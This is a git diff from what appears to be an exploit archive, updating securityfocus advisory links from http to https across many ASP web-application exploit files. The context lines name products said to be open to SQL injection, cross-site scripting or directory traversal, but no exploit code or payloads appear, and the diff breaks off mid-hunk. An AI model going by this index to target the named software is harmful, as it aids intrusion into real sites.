b/exploits/asp/webapps/29120.txt index ba40d5c39..1807abc1b 100644 --- a/exploits/asp/webapps/29120.txt +++ b/exploits/asp/webapps/29120.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21192/info +source: https://www.securityfocus.com/bid/21192/info eClassifieds is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29121.txt b/exploits/asp/webapps/29121.txt index fe8807ff7..5860043fd 100644 --- a/exploits/asp/webapps/29121.txt +++ b/exploits/asp/webapps/29121.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21193/info +source: https://www.securityfocus.com/bid/21193/info eHome is prone to multiple input-validation vulnerabilities, including cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29122.txt b/exploits/asp/webapps/29122.txt index b64fd5306..5f56b0427 100644 --- a/exploits/asp/webapps/29122.txt +++ b/exploits/asp/webapps/29122.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21193/info +source: https://www.securityfocus.com/bid/21193/info eHome is prone to multiple input-validation vulnerabilities, including cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29123.txt b/exploits/asp/webapps/29123.txt index 4b6fc11ca..cba702349 100644 --- a/exploits/asp/webapps/29123.txt +++ b/exploits/asp/webapps/29123.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21193/info +source: https://www.securityfocus.com/bid/21193/info eHome is prone to multiple input-validation vulnerabilities, including cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29124.txt b/exploits/asp/webapps/29124.txt index 9f666e79e..199d08d86 100644 --- a/exploits/asp/webapps/29124.txt +++ b/exploits/asp/webapps/29124.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21193/info +source: https://www.securityfocus.com/bid/21193/info eHome is prone to multiple input-validation vulnerabilities, including cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29126.txt b/exploits/asp/webapps/29126.txt index 42492dd92..0802c3487 100644 --- a/exploits/asp/webapps/29126.txt +++ b/exploits/asp/webapps/29126.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21194/info +source: https://www.securityfocus.com/bid/21194/info Gnews Publisher is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29133.txt b/exploits/asp/webapps/29133.txt index 8c661af4e..ae9b521fa 100644 --- a/exploits/asp/webapps/29133.txt +++ b/exploits/asp/webapps/29133.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21197/info +source: https://www.securityfocus.com/bid/21197/info Rapid Classified is prone to multiple input-validation issues, including multiple cross-site scripting issues and an SQL-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29134.txt b/exploits/asp/webapps/29134.txt index 0494cb186..5476a8106 100644 --- a/exploits/asp/webapps/29134.txt +++ b/exploits/asp/webapps/29134.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21197/info +source: https://www.securityfocus.com/bid/21197/info Rapid Classified is prone to multiple input-validation issues, including multiple cross-site scripting issues and an SQL-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29135.txt b/exploits/asp/webapps/29135.txt index 3f3cd4176..ee020938d 100644 --- a/exploits/asp/webapps/29135.txt +++ b/exploits/asp/webapps/29135.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21197/info +source: https://www.securityfocus.com/bid/21197/info Rapid Classified is prone to multiple input-validation issues, including multiple cross-site scripting issues and an SQL-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29136.txt b/exploits/asp/webapps/29136.txt index 9a6574dd9..74cd6b23b 100644 --- a/exploits/asp/webapps/29136.txt +++ b/exploits/asp/webapps/29136.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21197/info +source: https://www.securityfocus.com/bid/21197/info Rapid Classified is prone to multiple input-validation issues, including multiple cross-site scripting issues and an SQL-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29137.txt b/exploits/asp/webapps/29137.txt index b427e797b..c108c31d7 100644 --- a/exploits/asp/webapps/29137.txt +++ b/exploits/asp/webapps/29137.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21197/info +source: https://www.securityfocus.com/bid/21197/info Rapid Classified is prone to multiple input-validation issues, including multiple cross-site scripting issues and an SQL-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29141.txt b/exploits/asp/webapps/29141.txt index 4506e8380..c9089ecd8 100644 --- a/exploits/asp/webapps/29141.txt +++ b/exploits/asp/webapps/29141.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21198/info +source: https://www.securityfocus.com/bid/21198/info The Classified Ad System is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29142.txt b/exploits/asp/webapps/29142.txt index 24eaec0ed..ba03f9e1c 100644 --- a/exploits/asp/webapps/29142.txt +++ b/exploits/asp/webapps/29142.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21199/info +source: https://www.securityfocus.com/bid/21199/info Klf-Realty is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29143.txt b/exploits/asp/webapps/29143.txt index cb5a8e188..d281edde2 100644 --- a/exploits/asp/webapps/29143.txt +++ b/exploits/asp/webapps/29143.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21199/info +source: https://www.securityfocus.com/bid/21199/info Klf-Realty is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29151.txt b/exploits/asp/webapps/29151.txt index 18b7cf0df..39004652a 100644 --- a/exploits/asp/webapps/29151.txt +++ b/exploits/asp/webapps/29151.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21225/info +source: https://www.securityfocus.com/bid/21225/info Link Exchange Lite is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29152.txt b/exploits/asp/webapps/29152.txt index 17c223df0..fcab3c565 100644 --- a/exploits/asp/webapps/29152.txt +++ b/exploits/asp/webapps/29152.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21226/info +source: https://www.securityfocus.com/bid/21226/info JiRos Links Manager is prone to multiple input-validation vulnerabilities, including SQL- and HTML-injection issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29153.txt b/exploits/asp/webapps/29153.txt index 7849f5615..99403d712 100644 --- a/exploits/asp/webapps/29153.txt +++ b/exploits/asp/webapps/29153.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21226/info +source: https://www.securityfocus.com/bid/21226/info JiRos Links Manager is prone to multiple input-validation vulnerabilities, including SQL- and HTML-injection issues, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29154.txt b/exploits/asp/webapps/29154.txt index 9a7144b4e..0876b79fe 100644 --- a/exploits/asp/webapps/29154.txt +++ b/exploits/asp/webapps/29154.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21230/info +source: https://www.securityfocus.com/bid/21230/info Creascripts creadirectory is prone to multiple input-validation vulnerabilities, inculding SQL-injection issues and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29155.txt b/exploits/asp/webapps/29155.txt index a0746f7b5..8b62c5c45 100644 --- a/exploits/asp/webapps/29155.txt +++ b/exploits/asp/webapps/29155.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21230/info +source: https://www.securityfocus.com/bid/21230/info Creascripts creadirectory is prone to multiple input-validation vulnerabilities, inculding SQL-injection issues and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29156.txt b/exploits/asp/webapps/29156.txt index bd7008cf2..5c52c934b 100644 --- a/exploits/asp/webapps/29156.txt +++ b/exploits/asp/webapps/29156.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21230/info +source: https://www.securityfocus.com/bid/21230/info Creascripts creadirectory is prone to multiple input-validation vulnerabilities, inculding SQL-injection issues and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29174.txt b/exploits/asp/webapps/29174.txt index 0daab3fc7..bfe44e4ef 100644 --- a/exploits/asp/webapps/29174.txt +++ b/exploits/asp/webapps/29174.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21273/info +source: https://www.securityfocus.com/bid/21273/info MidiCart ASP is prone to an SQL injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29176.txt b/exploits/asp/webapps/29176.txt index 8bd462dca..30db83342 100644 --- a/exploits/asp/webapps/29176.txt +++ b/exploits/asp/webapps/29176.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21279/info +source: https://www.securityfocus.com/bid/21279/info ASP ListPics is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29178.txt b/exploits/asp/webapps/29178.txt index d40b3d93f..39b6e9953 100644 --- a/exploits/asp/webapps/29178.txt +++ b/exploits/asp/webapps/29178.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21282/info +source: https://www.securityfocus.com/bid/21282/info Fixit iDMS Pro is prone to multiple input-validation vulnerabilities, including SQL-injection issues and an HTML-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29179.txt b/exploits/asp/webapps/29179.txt index 9f94305b8..7406ef782 100644 --- a/exploits/asp/webapps/29179.txt +++ b/exploits/asp/webapps/29179.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21282/info +source: https://www.securityfocus.com/bid/21282/info Fixit iDMS Pro is prone to multiple input-validation vulnerabilities, including SQL-injection issues and an HTML-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29180.txt b/exploits/asp/webapps/29180.txt index c03975b1e..7c453a88b 100644 --- a/exploits/asp/webapps/29180.txt +++ b/exploits/asp/webapps/29180.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21286/info +source: https://www.securityfocus.com/bid/21286/info SIAP CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29189.txt b/exploits/asp/webapps/29189.txt index 788220568..d6e9031ff 100644 --- a/exploits/asp/webapps/29189.txt +++ b/exploits/asp/webapps/29189.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21289/info +source: https://www.securityfocus.com/bid/21289/info fipsShop is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29191.txt b/exploits/asp/webapps/29191.txt index 859a0a5f5..9312722eb 100644 --- a/exploits/asp/webapps/29191.txt +++ b/exploits/asp/webapps/29191.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21302/info +source: https://www.securityfocus.com/bid/21302/info ClickContact is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29192.txt b/exploits/asp/webapps/29192.txt index 2481f54fd..51453b624 100644 --- a/exploits/asp/webapps/29192.txt +++ b/exploits/asp/webapps/29192.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21310/info +source: https://www.securityfocus.com/bid/21310/info Clickblog is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29193.txt b/exploits/asp/webapps/29193.txt index 5e1118375..3328ae479 100644 --- a/exploits/asp/webapps/29193.txt +++ b/exploits/asp/webapps/29193.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21311/info +source: https://www.securityfocus.com/bid/21311/info Click Gallery is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/29195.txt b/exploits/asp/webapps/29195.txt index 9287dfaee..23a62ee3b 100644 --- a/exploits/asp/webapps/29195.txt +++ b/exploits/asp/webapps/29195.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21319/info +source: https://www.securityfocus.com/bid/21319/info uPhotoGallery is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29196.txt b/exploits/asp/webapps/29196.txt index aef471e34..866288251 100644 --- a/exploits/asp/webapps/29196.txt +++ b/exploits/asp/webapps/29196.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21319/info +source: https://www.securityfocus.com/bid/21319/info uPhotoGallery is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29197.txt b/exploits/asp/webapps/29197.txt index 1a28b8f61..9e1a7c40a 100644 --- a/exploits/asp/webapps/29197.txt +++ b/exploits/asp/webapps/29197.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21323/info +source: https://www.securityfocus.com/bid/21323/info Evolve Shopping Cart is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29216.html b/exploits/asp/webapps/29216.html index 26a6ed050..3e0eabf60 100644 --- a/exploits/asp/webapps/29216.html +++ b/exploits/asp/webapps/29216.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21398/info +source: https://www.securityfocus.com/bid/21398/info Aspee Ziyaretçi Defteri is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29219.txt b/exploits/asp/webapps/29219.txt index 4b6d60915..ffb616f9a 100644 --- a/exploits/asp/webapps/29219.txt +++ b/exploits/asp/webapps/29219.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21405/info +source: https://www.securityfocus.com/bid/21405/info Multiple DuWare products are prone to multiple SQL-injection vulnerabilities because they fail to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/29220.html b/exploits/asp/webapps/29220.html index 4f0e0df57..8368a3ac7 100644 --- a/exploits/asp/webapps/29220.html +++ b/exploits/asp/webapps/29220.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21418/info +source: https://www.securityfocus.com/bid/21418/info Metyus Okul Yonetim Sistemi is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29224.txt b/exploits/asp/webapps/29224.txt index d715560b3..535167350 100644 --- a/exploits/asp/webapps/29224.txt +++ b/exploits/asp/webapps/29224.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21426/info +source: https://www.securityfocus.com/bid/21426/info Uapplication Uguestbook is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29227.txt b/exploits/asp/webapps/29227.txt index c0d5cf3a7..bff5ec62b 100644 --- a/exploits/asp/webapps/29227.txt +++ b/exploits/asp/webapps/29227.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21428/info +source: https://www.securityfocus.com/bid/21428/info Vt-Forum Lite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29228.txt b/exploits/asp/webapps/29228.txt index bbd586b42..ad2635ec9 100644 --- a/exploits/asp/webapps/29228.txt +++ b/exploits/asp/webapps/29228.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21428/info +source: https://www.securityfocus.com/bid/21428/info Vt-Forum Lite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29231.txt b/exploits/asp/webapps/29231.txt index ce82978a1..732fe8142 100644 --- a/exploits/asp/webapps/29231.txt +++ b/exploits/asp/webapps/29231.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21463/info +source: https://www.securityfocus.com/bid/21463/info The 'dol storye' application is prone to multiple SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29240.txt b/exploits/asp/webapps/29240.txt index b9023384b..f9ec2b560 100644 --- a/exploits/asp/webapps/29240.txt +++ b/exploits/asp/webapps/29240.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21511/info +source: https://www.securityfocus.com/bid/21511/info Ã?ilem Haber Free Edition is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29241.txt b/exploits/asp/webapps/29241.txt index 49bb20c4d..476439a0d 100644 --- a/exploits/asp/webapps/29241.txt +++ b/exploits/asp/webapps/29241.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21512/info +source: https://www.securityfocus.com/bid/21512/info MaviPortal is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29271.txt b/exploits/asp/webapps/29271.txt index 308287c25..56a0acf83 100644 --- a/exploits/asp/webapps/29271.txt +++ b/exploits/asp/webapps/29271.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21521/info +source: https://www.securityfocus.com/bid/21521/info AppIntellect SpotLight CRM is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29276.txt b/exploits/asp/webapps/29276.txt index 06d7fd4bb..dd641810a 100644 --- a/exploits/asp/webapps/29276.txt +++ b/exploits/asp/webapps/29276.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21536/info +source: https://www.securityfocus.com/bid/21536/info Request For Travel is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29288.txt b/exploits/asp/webapps/29288.txt index 93ca993c3..95a257cd9 100644 --- a/exploits/asp/webapps/29288.txt +++ b/exploits/asp/webapps/29288.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21620/info +source: https://www.securityfocus.com/bid/21620/info Omniture SiteCatalyst is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29293.txt b/exploits/asp/webapps/29293.txt index e5df6683f..ea81a028c 100644 --- a/exploits/asp/webapps/29293.txt +++ b/exploits/asp/webapps/29293.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21626/info +source: https://www.securityfocus.com/bid/21626/info Contra Haber Sistemi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29333.txt b/exploits/asp/webapps/29333.txt index c3f2fecbb..b1d57db77 100644 --- a/exploits/asp/webapps/29333.txt +++ b/exploits/asp/webapps/29333.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21726/info +source: https://www.securityfocus.com/bid/21726/info Efkan Forum is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29336.txt b/exploits/asp/webapps/29336.txt index dd192ec76..d644e5ea8 100644 --- a/exploits/asp/webapps/29336.txt +++ b/exploits/asp/webapps/29336.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21732/info +source: https://www.securityfocus.com/bid/21732/info Chatwm is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29357.txt b/exploits/asp/webapps/29357.txt index 114582ff2..a9f6b7064 100644 --- a/exploits/asp/webapps/29357.txt +++ b/exploits/asp/webapps/29357.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21786/info +source: https://www.securityfocus.com/bid/21786/info Hosting Controller is prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29358.txt b/exploits/asp/webapps/29358.txt index 8c95ef59d..232869d6e 100644 --- a/exploits/asp/webapps/29358.txt +++ b/exploits/asp/webapps/29358.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21788/info +source: https://www.securityfocus.com/bid/21788/info DMXReady Secure Login Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/29359.txt b/exploits/asp/webapps/29359.txt index 3881b8aa0..0b3227601 100644 --- a/exploits/asp/webapps/29359.txt +++ b/exploits/asp/webapps/29359.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21788/info +source: https://www.securityfocus.com/bid/21788/info DMXReady Secure Login Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/29360.txt b/exploits/asp/webapps/29360.txt index a5bdd011f..3bd31c789 100644 --- a/exploits/asp/webapps/29360.txt +++ b/exploits/asp/webapps/29360.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21788/info +source: https://www.securityfocus.com/bid/21788/info DMXReady Secure Login Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/29361.txt b/exploits/asp/webapps/29361.txt index 7a7b80f57..3a7a943f5 100644 --- a/exploits/asp/webapps/29361.txt +++ b/exploits/asp/webapps/29361.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21788/info +source: https://www.securityfocus.com/bid/21788/info DMXReady Secure Login Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/asp/webapps/29373.txt b/exploits/asp/webapps/29373.txt index 31c17df49..d009524fd 100644 --- a/exploits/asp/webapps/29373.txt +++ b/exploits/asp/webapps/29373.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21822/info +source: https://www.securityfocus.com/bid/21822/info Spooky Login is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29385.txt b/exploits/asp/webapps/29385.txt index 5a5b7f48d..4b6e1b5af 100644 --- a/exploits/asp/webapps/29385.txt +++ b/exploits/asp/webapps/29385.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21889/info +source: https://www.securityfocus.com/bid/21889/info Kolayindir Download is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29398.txt b/exploits/asp/webapps/29398.txt index 84aeaffdd..255f79d9a 100644 --- a/exploits/asp/webapps/29398.txt +++ b/exploits/asp/webapps/29398.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21905/info +source: https://www.securityfocus.com/bid/21905/info Shopstorenow E-commerce Shopping Cart is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29401.txt b/exploits/asp/webapps/29401.txt index 5c96f6715..57fb2b630 100644 --- a/exploits/asp/webapps/29401.txt +++ b/exploits/asp/webapps/29401.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21929/info +source: https://www.securityfocus.com/bid/21929/info Createauction is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29456.txt b/exploits/asp/webapps/29456.txt index 306f4ee29..3b913349d 100644 --- a/exploits/asp/webapps/29456.txt +++ b/exploits/asp/webapps/29456.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22052/info +source: https://www.securityfocus.com/bid/22052/info InstantForum.NET is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/29457.txt b/exploits/asp/webapps/29457.txt index 682efef52..f1871c2fc 100644 --- a/exploits/asp/webapps/29457.txt +++ b/exploits/asp/webapps/29457.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22052/info +source: https://www.securityfocus.com/bid/22052/info InstantForum.NET is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/29533.html b/exploits/asp/webapps/29533.html index e69135237..88a3fe1a9 100644 --- a/exploits/asp/webapps/29533.html +++ b/exploits/asp/webapps/29533.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22281/info +source: https://www.securityfocus.com/bid/22281/info AdMentor is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29596.txt b/exploits/asp/webapps/29596.txt index bd30fb505..41586bd4d 100644 --- a/exploits/asp/webapps/29596.txt +++ b/exploits/asp/webapps/29596.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22528/info +source: https://www.securityfocus.com/bid/22528/info eWay is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29597.txt b/exploits/asp/webapps/29597.txt index b09d358b5..8bcf4c556 100644 --- a/exploits/asp/webapps/29597.txt +++ b/exploits/asp/webapps/29597.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22529/info +source: https://www.securityfocus.com/bid/22529/info Community Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29600.txt b/exploits/asp/webapps/29600.txt index cba607045..cb0cbc9be 100644 --- a/exploits/asp/webapps/29600.txt +++ b/exploits/asp/webapps/29600.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22545/info +source: https://www.securityfocus.com/bid/22545/info Fullaspsite Shop is prone to multiple input-validation issues, including multiple cross-site scripting issues and an SQL-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29601.txt b/exploits/asp/webapps/29601.txt index 208d3ab80..2b352f712 100644 --- a/exploits/asp/webapps/29601.txt +++ b/exploits/asp/webapps/29601.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22545/info +source: https://www.securityfocus.com/bid/22545/info Fullaspsite Shop is prone to multiple input-validation issues, including multiple cross-site scripting issues and an SQL-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29611.txt b/exploits/asp/webapps/29611.txt index 30673668e..23a73e542 100644 --- a/exploits/asp/webapps/29611.txt +++ b/exploits/asp/webapps/29611.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22591/info +source: https://www.securityfocus.com/bid/22591/info Turuncu Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29622.txt b/exploits/asp/webapps/29622.txt index b10c6bc1f..338fefc04 100644 --- a/exploits/asp/webapps/29622.txt +++ b/exploits/asp/webapps/29622.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22636/info +source: https://www.securityfocus.com/bid/22636/info Userpages2 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29726.pl b/exploits/asp/webapps/29726.pl index eaa189d28..231d5daa9 100755 --- a/exploits/asp/webapps/29726.pl +++ b/exploits/asp/webapps/29726.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22910/info +source: https://www.securityfocus.com/bid/22910/info Duyuru Scripti is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29817.txt b/exploits/asp/webapps/29817.txt index a99cea56d..2c9aabb9e 100644 --- a/exploits/asp/webapps/29817.txt +++ b/exploits/asp/webapps/29817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23316/info +source: https://www.securityfocus.com/bid/23316/info Gazi Okul Sitesi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29929.txt b/exploits/asp/webapps/29929.txt index f6784ca5d..c03282343 100644 --- a/exploits/asp/webapps/29929.txt +++ b/exploits/asp/webapps/29929.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23678/info +source: https://www.securityfocus.com/bid/23678/info Burak Yilmaz Blog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29933.txt b/exploits/asp/webapps/29933.txt index eae02d505..ecf9bff47 100644 --- a/exploits/asp/webapps/29933.txt +++ b/exploits/asp/webapps/29933.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23714/info +source: https://www.securityfocus.com/bid/23714/info Gazi Download Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29958.txt b/exploits/asp/webapps/29958.txt index 